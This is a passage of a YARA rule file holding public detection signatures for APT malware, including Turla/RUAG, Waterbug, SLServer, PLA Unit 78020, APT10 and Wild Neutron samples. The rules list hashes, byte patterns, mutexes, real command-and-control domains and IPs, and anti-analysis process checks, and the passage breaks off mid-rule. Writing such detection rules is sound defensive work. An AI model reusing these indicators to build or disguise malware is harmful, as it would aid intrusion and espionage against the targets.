    hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
    hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
    hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
    hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
    hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
    hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
    hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
    hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
  strings:
    $x1 = "too long data for this type of transport" ascii fullword
    $x2 = "not enough server resources to complete operation" ascii fullword
    $x3 = "Task not execute. Arg file failed." ascii fullword
    $x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" ascii fullword
    $s1 = "peer has closed the connection" ascii fullword
    $s2 = "tcpdump.exe" ascii fullword
    $s3 = "windump.exe" ascii fullword
    $s4 = "dsniff.exe" ascii fullword
    $s5 = "wireshark.exe" ascii fullword
    $s6 = "ethereal.exe" ascii fullword
    $s7 = "snoop.exe" ascii fullword
    $s8 = "ettercap.exe" ascii fullword
    $s9 = "miniport.dat" ascii fullword
    $s10 = "net_password=%s" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and (2 of ($x*) or 8 of ($s*))) or (12 of them)
}

rule Turla_APT_Malware_Gen2 {
  meta:
    description = "Detects Turla malware (based on sample used in the RUAG APT case)"
    author = "Florian Roth"
    family = "Turla"
    reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
    date = "2016-06-09"
    hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
    hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
    hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
    hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
  strings:
    $x1 = "Internal command not support =((" ascii fullword
    $x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" ascii fullword
    $x3 = "L|-1|CreateProcessAsUser():%d, %s|" ascii fullword
    $x4 = "AS_CUR_USER:OpenProcessToken():%d" ascii fullword
    $x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" ascii fullword
    $x6 = "L|-1|try to run dll %s with user priv|" ascii fullword
    $x7 = "\\\\.\\Global\\PIPE\\sdlrpc" ascii fullword
    $x8 = "\\\\%s\\pipe\\comnode" ascii fullword
    $x9 = "Plugin dll stop failed." ascii fullword
    $x10 = "AS_USER:LogonUser():%d" ascii fullword
    $s1 = "MSIMGHLP.DLL" wide fullword
    $s2 = "msimghlp.dll" ascii fullword
    $s3 = "ximarsh.dll" ascii fullword
    $s4 = "msximl.dll" ascii fullword
    $s5 = "INTERNAL.dll" ascii fullword
    $s6 = "\\\\.\\Global\\PIPE\\" ascii fullword
    $s7 = "ieuser.exe" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and (1 of ($x*) or 5 of ($s*))) or (10 of them)
}

rule Turla_APT_Malware_Gen3 {
  meta:
    description = "Detects Turla malware (based on sample used in the RUAG APT case)"
    author = "Florian Roth"
    family = "Turla"
    reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
    date = "2016-06-09"
    hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
    hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
    hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
    hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
    hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
    hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
    hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
    hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
    hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
  strings:
    $x1 = "\\\\.\\pipe\\sdlrpc" ascii fullword
    $x2 = "WaitMutex Abandoned %p" ascii fullword
    $x3 = "OPER|Wrong config: no port|" ascii fullword
    $x4 = "OPER|Wrong config: no lastconnect|" ascii fullword
    $x5 = "OPER|Wrong config: empty address|" ascii fullword
    $x6 = "Trans task %d obj %s ACTIVE fail robj %s" ascii fullword
    $x7 = "OPER|Wrong config: no auth|" ascii fullword
    $x8 = "OPER|Sniffer '%s' running... ooopppsss...|" ascii fullword
    $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" ascii fullword
    $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" ascii fullword
    $s3 = "www.yahoo.com" ascii fullword
    $s4 = "MSXIML.DLL" wide fullword
    $s5 = "www.bing.com" ascii fullword
    $s6 = "%s: http://%s%s" ascii fullword
    $s7 = "/javascript/view.php" ascii fullword
    $s8 = "Task %d failed %s,%d" ascii fullword
    $s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and (1 of ($x*) or 6 of ($s*))) or (10 of them)
}

rule RUAG_Tavdig_Malformed_Executable {
  meta:
    description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
    author = "Florian Roth"
    reference = "https://goo.gl/N5MEj0"
    score = 60
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 44299
}

rule RUAG_Bot_Config_File {
  meta:
    description = "Detects a specific config file used by malware in RUAG APT case"
    author = "Florian Roth"
    reference = "https://goo.gl/N5MEj0"
    score = 60
  strings:
    $s1 = "[CONFIG]" ascii
    $s2 = "name = " ascii
    $s3 = "exe = cmd.exe" ascii
  condition:
    $s1 at 0 and $s2 and $s3 and filesize < 160
}

rule RUAG_Cobra_Malware {
  meta:
    description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
    author = "Florian Roth"
    reference = "https://goo.gl/N5MEj0"
    score = 60
  strings:
    $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
  condition:
    uint16(0) == 23117 and $s1
}

rule RUAG_Cobra_Config_File {
  meta:
    description = "Detects a config text file used by malware Cobra in RUAG case"
    author = "Florian Roth"
    reference = "https://goo.gl/N5MEj0"
    score = 60
  strings:
    $h1 = "[NAME]" ascii
    $s1 = "object_id=" ascii
    $s2 = "[TIME]" ascii fullword
    $s3 = "lastconnect" ascii
    $s4 = "[CW_LOCAL]" ascii fullword
    $s5 = "system_pipe" ascii
    $s6 = "user_pipe" ascii
    $s7 = "[TRANSPORT]" ascii
    $s8 = "run_task_system" ascii
    $s9 = "[WORKDATA]" ascii
    $s10 = "address1" ascii
  condition:
    $h1 at 0 and 8 of ($s*) and filesize < 5120
}

rule RUAG_Exfil_Config_File {
  meta:
    description = "Detects a config text file used in data exfiltration in RUAG case"
    author = "Florian Roth"
    reference = "https://goo.gl/N5MEj0"
    score = 60
  strings:
    $h1 = "[TRANSPORT]" ascii
    $s1 = "system_pipe" ascii
    $s2 = "spstatus" ascii
    $s3 = "adaptable" ascii
    $s4 = "post_frag" ascii
    $s5 = "pfsgrowperiod" ascii
  condition:
    $h1 at 0 and all of ($s*) and filesize < 1024
}

rule WaterBug_turla_dll {
  meta:
    description = "Symantec Waterbug Attack - Trojan Turla DLL"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://www.symantec.com/connect/blogs/turla-spying-tool-targets-governments-and-diplomats"
  strings:
    $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/
  condition:
    pe.exports("ee") and $a
}

rule turla_dropper {
  meta:
    maltype = "turla dropper"
    ref = "https://github.com/reed1713"
    reference = "http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf"
    date = "3/13/2014"
    description = "This sample was pulled from the bae systems snake campaign report. The Turla dropper creates a file in teh temp dir and registers an auto start service call \"RPC Endpoint Locator\"."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "AppData\\Local\\Temp\\rsys.exe"
    $type1 = "Service Control Manager"
    $eventid1 = "7036"
    $data1 = "RPC Endpoint Locator"
    $data2 = "running"
    $type2 = "Service Control Manager"
    $eventid2 = "7045"
    $data3 = "RPC Endpoint Locator"
    $data4 = "user mode service"
    $data5 = "auto start"
  condition:
    ($type and $eventid and $data) or ($type1 and $eventid1 and $data1 and $data2 and $type2 and $eventid2 and $data3 and $data4 and $data5)
}

rule dubseven_file_set {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for service files loading UP007"
  strings:
    $file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
    $file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
    $file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
    $file4 = "\\Microsoft\\Internet Explorer\\main.dll"
    $file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
    $file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
    $file7 = "\\Microsoft\\Internet Explorer\\mon"
    $file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and 3 of ($file*)
}

rule dubseven_dropper_registry_checks {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for registry keys checked for by the dropper"
  strings:
    $reg1 = "SOFTWARE\\360Safe\\Liveup"
    $reg2 = "Software\\360safe"
    $reg3 = "SOFTWARE\\kingsoft\\Antivirus"
    $reg4 = "SOFTWARE\\Avira\\Avira Destop"
    $reg5 = "SOFTWARE\\rising\\RAV"
    $reg6 = "SOFTWARE\\JiangMin"
    $reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and all of ($reg*)
}

rule dubseven_dropper_dialog_remains {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for related dialog remnants. How rude."
  strings:
    $dia1 = "fuckMessageBox 1.0" wide
    $dia2 = "Rundll 1.0" wide
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and any of them
}

rule maindll_mutex {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches on the maindll mutex"
    ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
  strings:
    $mutex = "h31415927tttt"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and $mutex
}

rule SLServer_dialog_remains {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for related dialog remnants."
    ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
  strings:
    $slserver = "SLServer" wide
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and $slserver
}

rule SLServer_mutex {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for the mutex."
    ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
  strings:
    $mutex = "M&GX^DSF&DA@F"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and $mutex
}

rule SLServer_command_and_control {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for the C2 server."
    ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
  strings:
    $c2 = "safetyssl.security-centers.com"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and $c2
}

rule SLServer_campaign_code {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for the related campaign code."
    ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
  strings:
    $campaign = "wthkdoc0106"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and $campaign
}

rule SLServer_unknown_string {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Searches for a unique string."
    ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
  strings:
    $string = "test-b7fa835a39"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and $string
}

rule Unit78020_Malware_Gen1 {
  meta:
    description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
    author = "Florian Roth"
    reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
    date = "2015-09-24"
    hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72"
    hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
    hash3 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
    hash4 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
    hash5 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
    hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790"
  strings:
    $x1 = "greensky27.vicp.net" wide fullword
    $x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" ascii fullword
    $x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" ascii fullword
    $x4 = "serch.vicp.net" wide fullword
    $x5 = "greensky27.vicp.net" wide fullword
    $x6 = "greensky27.vicp.net.as" wide fullword
    $x7 = "greensky27.vcip.net" wide fullword
    $x8 = "pnoc-ec.vicp.net" wide fullword
    $x9 = "aseanph.vicp.net" wide fullword
    $x10 = "pnoc.vicp.net" wide fullword
    $a1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
    $a2 = "User-Agent: Netscape" ascii fullword
    $a3 = "Accept-Language:En-us/r/n" wide fullword
    $a4 = "\\Office Start.lnk" wide fullword
    $a5 = "\\MSN Talk Start.lnk" wide fullword
    $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
    $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" ascii fullword
    $s3 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" wide fullword
    $s4 = "Content-Type:application/x-www-form-urlencoded/r/n" wide fullword
    $s5 = "Hello World!" wide fullword
    $s6 = "Accept-Encoding:gzip,deflate/r/n" wide fullword
    $s7 = "/%d%s%d" ascii fullword
    $s8 = "%02d-%02d-%02d %02d:%02d" wide fullword
    $s9 = "WininetMM Version 1.0" wide fullword
    $s10 = "WININETMM" wide fullword
    $s11 = "GET %dHTTP/1.1" ascii fullword
    $s12 = "POST http://%ws:%d/%d%s%dHTTP/1.1" ascii fullword
    $s13 = "PeekNamePipe" ascii fullword
    $s14 = "Normal.dot" ascii fullword
    $s15 = "R_eOR_eOR_eO)CiOS_eO" ascii fullword
    $s16 = "DRIVE_RAMDISK" wide fullword
    $s17 = "%s %s %s %s %d %d %d %d " ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 256000 and 1 of ($x*)) or 2 of ($a*) or 6 of ($s*)
}

rule Unit78020_Malware_1 {
  meta:
    description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
    author = "Florian Roth"
    reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
    date = "2015-09-24"
    hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a"
  strings:
    $s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" ascii fullword
    $s2 = "msictl.exe" ascii fullword
    $s3 = "127.0.0.1:8080" ascii fullword
    $s4 = "mshtml.dat" ascii fullword
    $s5 = "msisvc" ascii fullword
    $s6 = "NOKIAN95/WEB" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 163840 and 4 of them
}

rule Unit78020_Malware_Gen2 {
  meta:
    description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
    author = "Florian Roth"
    reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
    date = "2015-09-24"
    super_rule = 1
    hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
    hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
    hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a"
  strings:
    $s0 = "-GetModuleFileNameExW" ascii fullword
    $s1 = "\\MSN Talk Start.lnk" wide fullword
    $s2 = ":SeDebugPrivilege" wide fullword
    $s3 = "WinMM Version 1.0" wide fullword
    $s4 = "dwError1 = %d" ascii fullword
    $s5 = "*Can't Get" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule Unit78020_Malware_Gen3 {
  meta:
    description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
    author = "Florian Roth"
    reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
    date = "2015-09-24"
    super_rule = 1
    hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
    hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
  strings:
    $x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" ascii fullword
    $x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" ascii fullword
    $x3 = "J:\\chong\\" ascii
    $s1 = "User-Agent: Netscape" ascii fullword
    $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" ascii fullword
    $s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" wide fullword
    $s4 = "J:\\chong\\nod\\Release\\SslMM.exe" ascii fullword
    $s5 = "MM.exe" ascii fullword
    $s6 = "network.proxy.ssl" wide fullword
    $s7 = "PeekNamePipe" ascii fullword
    $s8 = "Host: %ws:%d" ascii fullword
    $s9 = "GET %dHTTP/1.1" ascii fullword
    $s10 = "SCHANNEL.DLL" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 1 of ($x*)) or 4 of ($s*)
}

rule APT_Uppercut {
  meta:
    description = "Detects APT10 MenuPass Uppercut"
    author = "Colin Cowie"
    reference = "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html"
    date = "2018-09-13"
  strings:
    $ip1 = "51.106.53.147"
    $ip2 = "153.92.210.208"
    $ip3 = "eservake.jetos.com"
    $c1 = "0x97A168D9697D40DD" wide
    $c2 = "0x7CF812296CCC68D5" wide
    $c3 = "0x652CB1CEFF1C0A00" wide
    $c4 = "0x27595F1F74B55278" wide
    $c5 = "0xD290626C85FB1CE3" wide
    $c6 = "0x409C7A89CFF0A727" wide
  condition:
    any of them or hash.md5(0, filesize) == "aa3f303c3319b14b4829fe2faa5999c1" or hash.md5(0, filesize) == "126067d634d94c45084cbe1d9873d895" or hash.md5(0, filesize) == "fce54b4886cac5c61eda1e7605483ca3"
}

rule WaterBug_wipbot_2013_core_PDF {
  meta:
    description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://t.co/rF35OaAXrl"
  strings:
    $PDF = "%PDF-"
    $a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/
    $b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
  condition:
    ($PDF at 0) and #a > 150 and #b > 200
}

rule WaterBug_wipbot_2013_dll {
  meta:
    description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://t.co/rF35OaAXrl"
  strings:
    $string1 = "/%s?rank=%s"
    $string2 = "ModuleStart\x00ModuleStop\x00start"
    $string3 = "1156fd22-3443-4344-c4ffff"
    $string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
  condition:
    2 of them
}

rule WaterBug_wipbot_2013_core {
  meta:
    description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://t.co/rF35OaAXrl"
  strings:
    $mz = "MZ"
    $code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00 }
    $code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4 }
    $code3 = { 90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04 }
    $code4 = { 55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0 }
  condition:
    $mz at 0 and (($code1 or $code2) or ($code3 and $code4))
}

rule WaterBug_turla_dropper {
  meta:
    description = "Symantec Waterbug Attack - Trojan Turla Dropper"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://t.co/rF35OaAXrl"
  strings:
    $a = { 0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34 }
    $b = { 48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8 }
  condition:
    all of them
}

rule WaterBug_fa_malware {
  meta:
    description = "Symantec Waterbug Attack - FA malware variant"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://t.co/rF35OaAXrl"
  strings:
    $mz = "MZ"
    $string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
    $string2 = "d:\\proj\\cn\\fa64\\"
    $string3 = "sengoku_Win32.sys\x00"
    $string4 = "rk_ntsystem.c"
    $string5 = "\\uroboros\\"
    $string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
  condition:
    ($mz at 0) and (any of ($string*))
}

rule WaterBug_sav {
  meta:
    description = "Symantec Waterbug Attack - SAV Malware"
    author = "Symantec Security Response"
    date = "22.01.2015"
    reference = "http://t.co/rF35OaAXrl"
  strings:
    $mz = "MZ"
    $code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
    $code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC 3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
    $code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
    $code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B }
  condition:
    ($mz at 0) and (($code1a or $code1b or $code1c) and $code2)
}

rule WildNeutron_Sample_1 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
  strings:
    $s0 = "LiveUpdater.exe" wide fullword
    $s1 = "id-at-postalAddress" ascii fullword
    $s2 = "%d -> %d (default)" wide fullword
    $s3 = "%s%s%s=%d,%s=%d,%s=%d," wide fullword
    $s8 = "id-ce-keyUsage" ascii fullword
    $s9 = "Key Usage" ascii fullword
    $s32 = "UPDATE_ID" wide fullword
    $s37 = "id-at-commonName" ascii fullword
    $s38 = "2008R2" wide fullword
    $s39 = "RSA-alt" ascii fullword
    $s40 = "%02d.%04d.%s" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 819200 and all of them
}

rule WildNeutron_Sample_2 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
  strings:
    $s0 = "rundll32.exe \"%s\",#1" wide fullword
    $s1 = "IgfxUpt.exe" wide fullword
    $s2 = "id-at-postalAddress" ascii fullword
    $s3 = "Intel(R) Common User Interface" wide fullword
    $s4 = "%s%s%s=%d,%s=%d,%s=%d," wide fullword
    $s11 = "Key Usage" ascii fullword
    $s12 = "Intel Integrated Graphics Updater" wide fullword
    $s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 614400 and all of them
}

rule WildNeutron_Sample_3 {
  meta:
    description = "Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
  strings:
    $x1 = "178.162.197.9" ascii fullword
    $x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" wide fullword
    $s1 = "LiveUpdater.exe" wide fullword
    $s2 = "id-at-postalAddress" ascii fullword
    $s3 = "%d -> %d (default)" wide fullword
    $s4 = "%s%s%s=%d,%s=%d,%s=%d," wide fullword
    $s5 = "id-at-serialNumber" ascii fullword
    $s6 = "ECDSA with SHA256" ascii fullword
    $s7 = "Acer LiveUpdater" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 2068480 and (1 of ($x*) or all of ($s*))
}

rule WildNeutron_Sample_4 {
  meta:
    description = "Wild Neutron APT Sample Rule - file b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
  strings:
    $x1 = "WinRAT-Win32-Release.exe" ascii fullword
    $s0 = "rundll32.exe \"%s\",#1" wide fullword
    $s1 = "RtlUpd.EXE" wide fullword
    $s2 = "RtlUpd.exe" wide fullword
    $s3 = "Driver Update and remove for Windows x64 or x86_32" wide fullword
    $s4 = "Realtek HD Audio Update and remove driver Tool" wide fullword
    $s5 = "%s%s%s=%d,%s=%d,%s=%d," wide fullword
    $s6 = "Key Usage" ascii fullword
    $s7 = "id-at-serialNumber" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1269760 and all of them
}

rule WildNeutron_Sample_5 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
  strings:
    $s0 = "LiveUpdater.exe" wide fullword
    $s1 = "id-at-postalAddress" ascii fullword
    $s2 = "%d -> %d (default)" wide fullword
    $s3 = "%s%s%s=%d,%s=%d,%s=%d," wide fullword
    $s4 = "sha-1WithRSAEncryption" ascii fullword
    $s5 = "Postal code" ascii fullword
    $s6 = "id-ce-keyUsage" ascii fullword
    $s7 = "Key Usage" ascii fullword
    $s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" ascii fullword
    $s9 = "%02d.%04d.%s" wide fullword
  condition:
